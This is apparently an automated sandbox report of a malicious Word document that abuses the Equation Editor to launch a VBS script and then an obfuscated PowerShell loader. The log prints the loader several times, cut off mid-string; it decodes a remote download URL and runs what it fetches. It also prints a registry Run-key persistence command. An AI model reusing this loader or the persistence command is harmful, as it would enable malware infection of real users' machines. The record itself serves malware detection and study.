Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: COACH APRIL ORDER.doc	Virustotal: Detection: 53%
Source: COACH APRIL ORDER.doc	ReversingLabs: Detection: 50%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\magicremoihohj75.vbs"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Langshans225 = 1;$Forandringssaetninger='Substrin';$Forandringssaetninger+='g';Function Thysanoura($Agentens){$Oncography=$Agentens.Length-$Langshans225;For($Preindisposing=5; $Preindisposing -lt $Oncography; $Preindisposing+=(6)){$Bugtningernes+=$Agentens.$Forandringssaetninger.Invoke($Preindisposing, $Langshans225);}$Bugtningernes;}function Dryptrrendes($Eksportpriserne){& ($Peridot) ($Eksportpriserne);}$Hjlpevariabels=Thysanoura 'tilbuMIndseo autozDiscoi tenolAnskulFo.tjaSolce/Nere 5 Pie.. Comp0 Dana St mm(PaafyW PleniNonden ehngdOmbyto NebewHindespost, .ooscNIsomeT,akul Fin h1Uriel0.uzzl.Tangs0Squal;Apart OmgreWPiratiBou,inShape6Uprid4Inspe;Un.il A,elpxBana,6Fo,ur4Promi;Pro s Gemmr U snvOuts :Sikri1Eu,as2Polac1reill.ardor0 Mett)Ultra MichGPra ie Salac HuddkLituroTaxon/Demor2 Hu t0Caeom1 He r0 Wri 0.nsum1Forma0vattp1Horiz .etjeF.gedaiAs uerProgreObersfObtecoKarikxDe,at/Pull,1Pwcat2.besk1Am.rb..nwid0 Fond ';$Epiphyll=Thysanoura ' triuULimmasEnefoeF,rklrShack-Tr,nsA SithgTi.sreLgstrnMennet Unbe ';$Jellab=Thysanoura ' Ma.ehPlusgtTilskt HekspSports P.ed: Meri/Propo/rabardSarodr DithiBrystv,fikke Rele..vrfagCaukfoCo umoMiljvgF,glelB,rgaeVacuu.SmidicBetleoPolyamTessa/EntrauConstcDamef?Aftjee ynebxLnkamp,inero OpvarIntegtVaria=SampldPiloboAnnitwPo.denforbrlMegacoTrvlearo kedFor i&Ho.seiGjortdPrint= Ener1Domi,H,nter8 EnnovAccru0 Tan.ZSpr t9,rsteqS.mle8Inte Bun,reOSp.tt4UnfavU KnapTSpindEMete NDornukAtavibF,rsiTMetalaSl ngiNycteWHei.spSpinocSuperiKroke8OpenhYUndiv0KongsjCe eaY isjRTheisnGu df3 Schl ';$Afprvendes=Thysanoura ' .ima>Ankny ';$Peridot=Thysanoura 'Un,ilikropeeFletnxPa.ah ';$Dysmorfismen = Thysanoura ' Amene ZimbcBesl.hGoddaoDrake Riba%OfferaSylt,pRdnbspAnlagdCrookaRenast EmbeaHoejr%,ones\UningddisiniChefkaLsdpelSagsko EluvgKonfiiHensys Delpt Be ui uffc Ram.. Du,oH.onsce H ndd Appa d,ivi& Caus&Grews DkseeHematc forsh ndeno Dans Couac$ Uret ';Dryptrrendes (Thysanoura ',eori$Omgrug arnel .ubloH.gleb rana FinllOppus:Ri,etIMindrnTiaartAfmr.ePsykorBlegsmUdfrsoAlumid ,misiPrivilpaperlTrykki SineoDoce nSlyng=Li,en( SangcTidsbmUnduld Tet C.nc/ Ha.dcvedre Sp y$PolypDOvervy SkumsKyurimTilbuoPremur AntifExperi delesExan mJernbe OvernJounc)opels ');Dryptrrendes (Thysanoura 'Pe.se$HexylgSpan,l Fusio .raubBejlea Udd.l .mer:Topo.OTu ehmWithhs ,plakFlankrn nehi.ybfrvPublie CrimnenzymdCheckeFor,ts Ove.=Dogmi$BebudJTotale S,belComprlGi.peaInputbTog,t.Ma tisRejempServilU.areiKop,lt Bund(Mamon$ SkobA ShopfWadmopUgedar AffavUnproeAblutnT,resdFejlreSvigesmisgr)Sjlss ');$Jellab=$Omskrivendes[0];Dryptrrendes (Thysanoura 'Mistr$IdeolgBlodtlDelkloTorc bKvadraOpruslKo ke:FriheD ulfaide.ras Ars pTilsyeS.attn SarrsVrel.aUndv,tHomagiForheoKiaatnVdderskine.sPe,veaKejseg de u=Phy,aN icroeCuculw Prec-AntliO actbStan jSr.kreSaltmcD ffetHalte MazemSForehySeisms Genet FireeGabesmFog.o.IrresN La.heSubsutg,rod.Snd rW SupreAkti bLsladCVedlalf
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\dialogistic.Hed && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Langshans225 = 1;$Forandringssaetninger='Substrin';$Forandringssaetninger+='g';Function Thysanoura($Agentens){$Oncography=$Agentens.Length-$Langshans225;For($Preindisposing=5; $Preindisposing -lt $Oncography; $Preindisposing+=(6)){$Bugtningernes+=$Agentens.$Forandringssaetninger.Invoke($Preindisposing, $Langshans225);}$Bugtningernes;}function Dryptrrendes($Eksportpriserne){& ($Peridot) ($Eksportpriserne);}$Hjlpevariabels=Thysanoura 'tilbuMIndseo autozDiscoi tenolAnskulFo.tjaSolce/Nere 5 Pie.. Comp0 Dana St mm(PaafyW PleniNonden ehngdOmbyto NebewHindespost, .ooscNIsomeT,akul Fin h1Uriel0.uzzl.Tangs0Squal;Apart OmgreWPiratiBou,inShape6Uprid4Inspe;Un.il A,elpxBana,6Fo,ur4Promi;Pro s Gemmr U snvOuts :Sikri1Eu,as2Polac1reill.ardor0 Mett)Ultra MichGPra ie Salac HuddkLituroTaxon/Demor2 Hu t0Caeom1 He r0 Wri 0.nsum1Forma0vattp1Horiz .etjeF.gedaiAs uerProgreObersfObtecoKarikxDe,at/Pull,1Pwcat2.besk1Am.rb..nwid0 Fond ';$Epiphyll=Thysanoura ' triuULimmasEnefoeF,rklrShack-Tr,nsA SithgTi.sreLgstrnMennet Unbe ';$Jellab=Thysanoura ' Ma.ehPlusgtTilskt HekspSports P.ed: Meri/Propo/rabardSarodr DithiBrystv,fikke Rele..vrfagCaukfoCo umoMiljvgF,glelB,rgaeVacuu.SmidicBetleoPolyamTessa/EntrauConstcDamef?Aftjee ynebxLnkamp,inero OpvarIntegtVaria=SampldPiloboAnnitwPo.denforbrlMegacoTrvlearo kedFor i&Ho.seiGjortdPrint= Ener1Domi,H,nter8 EnnovAccru0 Tan.ZSpr t9,rsteqS.mle8Inte Bun,reOSp.tt4UnfavU KnapTSpindEMete NDornukAtavibF,rsiTMetalaSl ngiNycteWHei.spSpinocSuperiKroke8OpenhYUndiv0KongsjCe eaY isjRTheisnGu df3 Schl ';$Afprvendes=Thysanoura ' .ima>Ankny ';$Peridot=Thysanoura 'Un,ilikropeeFletnxPa.ah ';$Dysmorfismen = Thysanoura ' Amene ZimbcBesl.hGoddaoDrake Riba%OfferaSylt,pRdnbspAnlagdCrookaRenast EmbeaHoejr%,ones\UningddisiniChefkaLsdpelSagsko EluvgKonfiiHensys Delpt Be ui uffc Ram.. Du,oH.onsce H ndd Appa d,ivi& Caus&Grews DkseeHematc forsh ndeno Dans Couac$ Uret ';Dryptrrendes (Thysanoura ',eori$Omgrug arnel .ubloH.gleb rana FinllOppus:Ri,etIMindrnTiaartAfmr.ePsykorBlegsmUdfrsoAlumid ,misiPrivilpaperlTrykki SineoDoce nSlyng=Li,en( SangcTidsbmUnduld Tet C.nc/ Ha.dcvedre Sp y$PolypDOvervy SkumsKyurimTilbuoPremur AntifExperi delesExan mJernbe OvernJounc)opels ');Dryptrrendes (Thysanoura 'Pe.se$HexylgSpan,l Fusio .raubBejlea Udd.l .mer:Topo.OTu ehmWithhs ,plakFlankrn nehi.ybfrvPublie CrimnenzymdCheckeFor,ts Ove.=Dogmi$BebudJTotale S,belComprlGi.peaInputbTog,t.Ma tisRejempServilU.areiKop,lt Bund(Mamon$ SkobA ShopfWadmopUgedar AffavUnproeAblutnT,resdFejlreSvigesmisgr)Sjlss ');$Jellab=$Omskrivendes[0];Dryptrrendes (Thysanoura 'Mistr$IdeolgBlodtlDelkloTorc bKvadraOpruslKo ke:FriheD ulfaide.ras Ars pTilsyeS.attn SarrsVrel.aUndv,tHomagiForheoKiaatnVdderskine.sPe,veaKejseg de u=Phy,aN icroeCuculw Prec-AntliO actbStan jSr.kreSaltmcD ffetHalte MazemSForehySeisms Genet FireeGabesmFog.o.IrresN La.heSubsutg,rod.Snd rW SupreAkti bLsladCVedlalf
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\dialogistic.Hed && echo $"
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Chansonens% -w 1 $Hypokonderens=(Get-ItemProperty -Path 'HKCU:\Oversigtslisterne\').Incharity;%Chansonens% ($Hypokonderens)"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Chansonens% -w 1 $Hypokonderens=(Get-ItemProperty -Path 'HKCU:\Oversigtslisterne\').Incharity;%Chansonens% ($Hypokonderens)"
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w 1 $Hypokonderens=(Get-ItemProperty -Path 'HKCU:\Oversigtslisterne\').Incharity;c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe ($Hypokonderens)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$Langshans225 = 1;$Forandringssaetninger='Substrin';$Forandringssaetninger+='g';Function Thysanoura($Agentens){$Oncography=$Agentens.Length-$Langshans225;For($Preindisposing=5; $Preindisposing -lt $Oncography; $Preindisposing+=(6)){$Bugtningernes+=$Agentens.$Forandringssaetninger.Invoke($Preindisposing, $Langshans225);}$Bugtningernes;}function Dryptrrendes($Eksportpriserne){& ($Peridot) ($Eksportpriserne);}$Hjlpevariabels=Thysanoura 'tilbuMIndseo autozDiscoi tenolAnskulFo.tjaSolce/Nere 5 Pie.. Comp0 Dana St mm(PaafyW PleniNonden ehngdOmbyto NebewHindespost, .ooscNIsomeT,akul Fin h1Uriel0.uzzl.Tangs0Squal;Apart OmgreWPiratiBou,inShape6Uprid4Inspe;Un.il A,elpxBana,6Fo,ur4Promi;Pro s Gemmr U snvOuts :Sikri1Eu,as2Polac1reill.ardor0 Mett)Ultra MichGPra ie Salac HuddkLituroTaxon/Demor2 Hu t0Caeom1 He r0 Wri 0.nsum1Forma0vattp1Horiz .etjeF.gedaiAs uerProgreObersfObtecoKarikxDe,at/Pull,1Pwcat2.besk1Am.rb..nwid0 Fond ';$Epiphyll=Thysanoura ' triuULimmasEnefoeF,rklrShack-Tr,nsA SithgTi.sreLgstrnMennet Unbe ';$Jellab=Thysanoura ' Ma.ehPlusgtTilskt HekspSports P.ed: Meri/Propo/rabardSarodr DithiBrystv,fikke Rele..vrfagCaukfoCo umoMiljvgF,glelB,rgaeVacuu.SmidicBetleoPolyamTessa/EntrauConstcDamef?Aftjee ynebxLnkamp,inero OpvarIntegtVaria=SampldPiloboAnnitwPo.denforbrlMegacoTrvlearo kedFor i&Ho.seiGjortdPrint= Ener1Domi,H,nter8 EnnovAccru0 Tan.ZSpr t9,rsteqS.mle8Inte Bun,reOSp.tt4UnfavU KnapTSpindEMete NDornukAtavibF,rsiTMetalaSl ngiNycteWHei.spSpinocSuperiKroke8OpenhYUndiv0KongsjCe eaY isjRTheisnGu df3 Schl ';$Afprvendes=Thysanoura ' .ima>Ankny ';$Peridot=Thysanoura 'Un,ilikropeeFletnxPa.ah ';$Dysmorfismen = Thysanoura ' Amene ZimbcBesl.hGoddaoDrake Riba%OfferaSylt,pRdnbspAnlagdCrookaRenast EmbeaHoejr%,ones\UningddisiniChefkaLsdpelSagsko EluvgKonfiiHensys Delpt Be ui uffc Ram.. Du,oH.onsce H ndd Appa d,ivi& Caus&Grews DkseeHematc forsh ndeno Dans Couac$ Uret ';Dryptrrendes (Thysanoura ',eori$Omgrug arnel .ubloH.gleb rana FinllOppus:Ri,etIMindrnTiaartAfmr.ePsykorBlegsmUdfrsoAlumid ,misiPrivilpaperlTrykki SineoDoce nSlyng=Li,en( SangcTidsbmUnduld Tet C.nc/ Ha.dcvedre Sp y$PolypDOvervy SkumsKyurimTilbuoPremur AntifExperi delesExan mJernbe OvernJounc)opels ');Dryptrrendes (Thysanoura 'Pe.se$HexylgSpan,l Fusio .raubBejlea Udd.l .mer:Topo.OTu ehmWithhs ,plakFlankrn nehi.ybfrvPublie CrimnenzymdCheckeFor,ts Ove.=Dogmi$BebudJTotale S,belComprlGi.peaInputbTog,t.Ma tisRejempServilU.areiKop,lt Bund(Mamon$ SkobA ShopfWadmopUgedar AffavUnproeAblutnT,resdFejlreSvigesmisgr)Sjlss ');$Jellab=$Omskrivendes[0];Dryptrrendes (Thysanoura 'Mistr$IdeolgBlodtlDelkloTorc bKvadraOpruslKo ke:FriheD ulfaide.ras Ars pTilsyeS.attn SarrsVrel.aUndv,tHomagiForheoKiaatnVdderskine.sPe,veaKejseg de u=Phy,aN icroeCuculw Prec-AntliO actbStan jSr.kreSaltmcD ffetHalte MazemSForehySeisms Genet FireeGabesmFog.o.IrresN La.heSubsutg,rod.Snd rW SupreAkti bLsladCVedlalf
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\dialogistic.Hed && echo $"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe "C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe"
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w 1 $Hypokonderens=(Get-ItemProperty -Path 'HKCU:\Oversigtslisterne\').Incharity;c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe ($Hypokonderens)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$Langshans225 = 1;$Forandringssaetninger='Substrin';$Forandringssaetninger+='g';Function Thysanoura($Agentens){$Oncography=$Agentens.Length-$Langshans225;For($Preindisposing=5; $Preindisposing -lt $Oncography; $Preindisposing+=(6)){$Bugtningernes+=$Agentens.$Forandringssaetninger.Invoke($Preindisposing, $Langshans225);}$Bugtningernes;}function Dryptrrendes($Eksportpriserne){& ($Peridot) ($Eksportpriserne);}$Hjlpevariabels=Thysanoura 'tilbuMIndseo autozDiscoi tenolAnskulFo.tjaSolce/Nere 5 Pie.. Comp0 Dana St mm(PaafyW PleniNonden ehngdOmbyto NebewHindespost, .ooscNIsomeT,akul Fin h1Uriel0.uzzl.Tangs0Squal;Apart OmgreWPiratiBou,inShape6Uprid4Inspe;Un.il A,elpxBana,6Fo,ur4Promi;Pro s Gemmr U snvOuts :Sikri1Eu,as2Polac1reill.ardor0 Mett)Ultra MichGPra ie Salac HuddkLituroTaxon/Demor2 Hu t0Caeom1 He r0 Wri 0.nsum1Forma0vattp1Horiz .etjeF.gedaiAs uerProgreObersfObtecoKarikxDe,at/Pull,1Pwcat2.besk1Am.rb..nwid0 Fond ';$Epiphyll=Thysanoura ' triuULimmasEnefoeF,rklrShack-Tr,nsA SithgTi.sreLgstrnMennet Unbe ';$Jellab=Thysanoura ' Ma.ehPlusgtTilskt HekspSports P.ed: Meri/Propo/rabardSarodr DithiBrystv,fikke Rele..vrfagCaukfoCo umoMiljvgF,glelB,rgaeVacuu.SmidicBetleoPolyamTessa/EntrauConstcDamef?Aftjee ynebxLnkamp,inero OpvarIntegtVaria=SampldPiloboAnnitwPo.denforbrlMegacoTrvlearo kedFor i&Ho.seiGjortdPrint= Ener1Domi,H,nter8 EnnovAccru0 Tan.ZSpr t9,rsteqS.mle8Inte Bun,reOSp.tt4UnfavU KnapTSpindEMete NDornukAtavibF,rsiTMetalaSl ngiNycteWHei.spSpinocSuperiKroke8OpenhYUndiv0KongsjCe eaY isjRTheisnGu df3 Schl ';$Afprvendes=Thysanoura ' .ima>Ankny ';$Peridot=Thysanoura 'Un,ilikropeeFletnxPa.ah ';$Dysmorfismen = Thysanoura ' Amene ZimbcBesl.hGoddaoDrake Riba%OfferaSylt,pRdnbspAnlagdCrookaRenast EmbeaHoejr%,ones\UningddisiniChefkaLsdpelSagsko EluvgKonfiiHensys Delpt Be ui uffc Ram.. Du,oH.onsce H ndd Appa d,ivi& Caus&Grews DkseeHematc forsh ndeno Dans Couac$ Uret ';Dryptrrendes (Thysanoura ',eori$Omgrug arnel .ubloH.gleb rana FinllOppus:Ri,etIMindrnTiaartAfmr.ePsykorBlegsmUdfrsoAlumid ,misiPrivilpaperlTrykki SineoDoce nSlyng=Li,en( SangcTidsbmUnduld Tet C.nc/ Ha.dcvedre Sp y$PolypDOvervy SkumsKyurimTilbuoPremur AntifExperi delesExan mJernbe OvernJounc)opels ');Dryptrrendes (Thysanoura 'Pe.se$HexylgSpan,l Fusio .raubBejlea Udd.l .mer:Topo.OTu ehmWithhs ,plakFlankrn nehi.ybfrvPublie CrimnenzymdCheckeFor,ts Ove.=Dogmi$BebudJTotale S,belComprlGi.peaInputbTog,t.Ma tisRejempServilU.areiKop,lt Bund(Mamon$ SkobA ShopfWadmopUgedar AffavUnproeAblutnT,resdFejlreSvigesmisgr)Sjlss ');$Jellab=$Omskrivendes[0];Dryptrrendes (Thysanoura 'Mistr$IdeolgBlodtlDelkloTorc bKvadraOpruslKo ke:FriheD ulfaide.ras Ars pTilsyeS.attn SarrsVrel.aUndv,tHomagiForheoKiaatnVdderskine.sPe,veaKejseg de u=Phy,aN icroeCuculw Prec-AntliO actbStan jSr.kreSaltmcD ffetHalte MazemSForehySeisms Genet FireeGabesmFog.o.IrresN La.heSubsutg,rod.Snd rW SupreAkti bLsladCVedlalf
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\dialogistic.Hed && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe "C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\magicremoihohj75.vbs"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Langshans225 = 1;$Forandringssaetninger='Substrin';$Forandringssaetninger+='g';Function Thysanoura($Agentens){$Oncography=$Agentens.Length-$Langshans225;For($Preindisposing=5; $Preindisposing -lt $Oncography; $Preindisposing+=(6)){$Bugtningernes+=$Agentens.$Forandringssaetninger.Invoke($Preindisposing, $Langshans225);}$Bugtningernes;}function Dryptrrendes($Eksportpriserne){& ($Peridot) ($Eksportpriserne);}$Hjlpevariabels=Thysanoura 'tilbuMIndseo autozDiscoi tenolAnskulFo.tjaSolce/Nere 5 Pie.. Comp0 Dana St mm(PaafyW PleniNonden ehngdOmbyto NebewHindespost, .ooscNIsomeT,akul Fin h1Uriel0.uzzl.Tangs0Squal;Apart OmgreWPiratiBou,inShape6Uprid4Inspe;Un.il A,elpxBana,6Fo,ur4Promi;Pro s Gemmr U snvOuts :Sikri1Eu,as2Polac1reill.ardor0 Mett)Ultra MichGPra ie Salac HuddkLituroTaxon/Demor2 Hu t0Caeom1 He r0 Wri 0.nsum1Forma0vattp1Horiz .etjeF.gedaiAs uerProgreObersfObtecoKarikxDe,at/Pull,1Pwcat2.besk1Am.rb..nwid0 Fond ';$Epiphyll=Thysanoura ' triuULimmasEnefoeF,rklrShack-Tr,nsA SithgTi.sreLgstrnMennet Unbe ';$Jellab=Thysanoura ' Ma.ehPlusgtTilskt HekspSports P.ed: Meri/Propo/rabardSarodr DithiBrystv,fikke Rele..vrfagCaukfoCo umoMiljvgF,glelB,rgaeVacuu.SmidicBetleoPolyamTessa/EntrauConstcDamef?Aftjee ynebxLnkamp,inero OpvarIntegtVaria=SampldPiloboAnnitwPo.denforbrlMegacoTrvlearo kedFor i&Ho.seiGjortdPrint= Ener1Domi,H,nter8 EnnovAccru0 Tan.ZSpr t9,rsteqS.mle8Inte Bun,reOSp.tt4UnfavU KnapTSpindEMete NDornukAtavibF,rsiTMetalaSl ngiNycteWHei.spSpinocSuperiKroke8OpenhYUndiv0KongsjCe eaY isjRTheisnGu df3 Schl ';$Afprvendes=Thysanoura ' .ima>Ankny ';$Peridot=Thysanoura 'Un,ilikropeeFletnxPa.ah ';$Dysmorfismen = Thysanoura ' Amene ZimbcBesl.hGoddaoDrake Riba%OfferaSylt,pRdnbspAnlagdCrookaRenast EmbeaHoejr%,ones\UningddisiniChefkaLsdpelSagsko EluvgKonfiiHensys Delpt Be ui uffc Ram.. Du,oH.onsce H ndd Appa d,ivi& Caus&Grews DkseeHematc forsh ndeno Dans Couac$ Uret ';Dryptrrendes (Thysanoura ',eori$Omgrug arnel .ubloH.gleb rana FinllOppus:Ri,etIMindrnTiaartAfmr.ePsykorBlegsmUdfrsoAlumid ,misiPrivilpaperlTrykki SineoDoce nSlyng=Li,en( SangcTidsbmUnduld Tet C.nc/ Ha.dcvedre Sp y$PolypDOvervy SkumsKyurimTilbuoPremur AntifExperi delesExan mJernbe OvernJounc)opels ');Dryptrrendes (Thysanoura 'Pe.se$HexylgSpan,l Fusio .raubBejlea Udd.l .mer:Topo.OTu ehmWithhs ,plakFlankrn nehi.ybfrvPublie CrimnenzymdCheckeFor,ts Ove.=Dogmi$BebudJTotale S,belComprlGi.peaInputbTog,t.Ma tisRejempServilU.areiKop,lt Bund(Mamon$ SkobA ShopfWadmopUgedar AffavUnproeAblutnT,resdFejlreSvigesmisgr)Sjlss ');$Jellab=$Omskrivendes[0];Dryptrrendes (Thysanoura 'Mistr$IdeolgBlodtlDelkloTorc bKvadraOpruslKo ke:FriheD ulfaide.ras Ars pTilsyeS.attn SarrsVrel.aUndv,tHomagiForheoKiaatnVdderskine.sPe,veaKejseg de u=Phy,aN icroeCuculw Prec-AntliO actbStan jSr.kreSaltmcD ffetHalte MazemSForehySeisms Genet FireeGabesmFog.o.IrresN La.heSubsutg,rod.Snd rW SupreAkti bLsladCVedlalf	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\dialogistic.Hed && echo $"	Jump to behavior
